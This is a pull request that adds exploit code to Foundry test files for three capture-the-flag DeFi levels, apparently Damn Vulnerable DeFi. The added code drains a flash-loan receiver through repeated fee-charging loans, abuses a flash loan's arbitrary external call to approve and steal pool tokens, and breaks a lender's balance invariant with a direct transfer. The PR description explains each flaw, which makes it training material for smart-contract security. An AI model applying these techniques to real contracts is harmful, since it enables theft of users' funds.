### PR TITLE
[feat] complete testing from lv1 to 4

### DIFF
--- a/test/Levels/naive-receiver/NaiveReceiver.t.sol
+++ b/test/Levels/naive-receiver/NaiveReceiver.t.sol
@@ -48,6 +48,14 @@ contract NaiveReceiver is Test {
         /**
          * EXPLOIT START *
          */
+        // 因為 fee 固定，所以認為要跑 10 次
+        for (uint256 i = 0; i < 10;) {
+            // Borrow 1 ETH from the pool
+            unchecked {
+                naiveReceiverLenderPool.flashLoan(address(flashLoanReceiver), 1e18);
+                ++i;
+            }
+        }
 
         /**
          * EXPLOIT END *

--- a/test/Levels/truster/Truster.t.sol
+++ b/test/Levels/truster/Truster.t.sol
@@ -41,6 +41,13 @@ contract Truster is Test {
         /**
          * EXPLOIT START *
          */
+        vm.startPrank(attacker);
+        // 寫到一半突然想到，既然餘額不能動，但拿到了執行權利 + 合約本身能當 msg.sender，就突然想到可以採取 approve 再 safeTransferFrom
+        trusterLenderPool.flashLoan(
+            0, attacker, address(dvt), abi.encodeWithSelector(dvt.approve.selector, attacker, TOKENS_IN_POOL)
+        );
+        dvt.transferFrom(address(trusterLenderPool), attacker, TOKENS_IN_POOL);
+        vm.stopPrank();
 
         /**
          * EXPLOIT END *

--- a/test/Levels/unstoppable/Unstoppable.t.sol
+++ b/test/Levels/unstoppable/Unstoppable.t.sol
@@ -60,6 +60,8 @@ contract Unstoppable is Test {
         /**
          * EXPLOIT START *
          */
+        vm.prank(attacker);
+        dvt.transfer(address(unstoppableLender), INITIAL_ATTACKER_TOKEN_BALANCE);
         /**
          * EXPLOIT END *
          */


### PR DESCRIPTION
- [x] unstoppable: we can always directly transfer tokens to an address to change balance
- [x] naive-receiver: same reminder as the unstoppable case, but with another example that shows the potential danger of using ETH but not WETH to trade native tokens
- [x] truster: it's vulnerable to give away the control of execution thread to another contract (external call)
- [x] side-entrance: a case shows vulnerability by combining the above cases (checking balance & external call)